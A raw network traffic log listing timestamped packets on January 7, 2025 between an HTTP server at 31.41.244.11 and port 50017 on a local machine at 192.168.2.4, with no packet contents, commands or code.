Jan 7, 2025 10:09:00.114399910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114408970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114443064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114458084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114607096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114617109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114625931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114634991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114645004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114654064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114664078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114664078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114682913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114694118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114697933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114707947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114717007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114718914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114728928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114738941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114742994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114780903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195219040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195246935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195256948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195283890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195307970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195365906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195377111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195389032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195400953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195411921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195421934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195441961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195458889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195461035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195487022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195497990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195509911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195513010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195522070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195533037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195545912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195559978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195563078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195574045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.195591927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.195627928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229454041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229525089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229526997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229537964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229548931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229559898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229574919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229584932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229587078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229607105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229617119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229620934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229633093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229641914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229675055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229716063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229721069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229728937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229746103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229757071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229768038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229800940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229820967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229834080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229842901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229852915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229866982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229876995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229927063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229940891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.229952097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.229962111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230083942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230185032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230195045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230205059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230237007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230247021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230253935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230258942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230269909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230278969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230289936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230318069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230345011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230355024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230365992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230376005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230398893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230410099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230537891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230581999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230591059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230602026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230614901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230626106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230649948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230689049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230698109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230705023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230712891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230736017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230763912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230828047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230844021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230853081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230886936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230921030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230931044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230942965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230958939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230967045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230977058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.230978012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.230990887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231002092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231014013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231026888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231071949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231092930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231103897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231112957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231144905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231163025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231174946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231184959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231195927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231206894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231230974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231266975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231458902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231475115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231486082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231496096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231508017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231515884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231523991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231532097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231555939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231556892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231564999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231579065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231585979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231611013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231646061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231662989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231673002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231682062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231710911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231908083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231921911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.231960058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.231981039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232022047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232044935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232053995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232073069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232089043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232091904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232100010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232115984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232142925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232211113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232254982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232264996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232275963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232284069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232304096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232321978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232408047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232424021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232495070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232505083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232515097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232546091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232559919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232568026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232570887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232599020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232626915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232672930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232695103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232817888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232826948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232837915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232848883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232857943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232872963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232891083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232897997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232919931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232923985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232934952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232944012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.232949972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232969999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.232990980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233000040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233011007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233124971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233129978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233165979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233190060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233200073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233210087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233242989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233262062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233273029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233294964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233349085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233359098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233367920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233421087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233434916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233438969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233463049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233474016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233480930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233491898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233505964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233505964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233558893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233699083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233736038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233748913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233756065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233781099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233783960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233792067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233799934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233822107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233822107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233834028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233836889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233848095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233863115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233875990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.233890057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.233918905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282124996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282136917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282155991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282167912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282180071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282218933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282259941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282273054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282274008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282284975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282298088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282305002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282313108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282340050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282340050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282340050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282356977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282376051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282393932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282406092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282418966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282428980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.282435894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282448053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.282465935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316348076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316359997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316379070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316389084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316399097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316410065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316433907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316468000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316479921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316483021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316504955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316520929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316593885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316606045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316622019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316632032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316641092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316662073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316668987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316673994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316684961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316690922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316699028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316730976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316745043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316756010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316756964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316768885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316778898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316783905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316796064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316811085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316831112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.316869020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.316905022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317012072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317022085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317032099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317056894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317061901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317074060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317089081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317101955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317114115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317131042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317137003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317157984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317234039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317244053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317254066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317277908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317296982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317380905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317389965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317394972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317403078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317411900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317420959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317424059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317464113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317480087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317552090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317567110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317578077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317605019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317626953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317682028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317692995 CET	80	50017	31.41.244.11	192.168.2.4
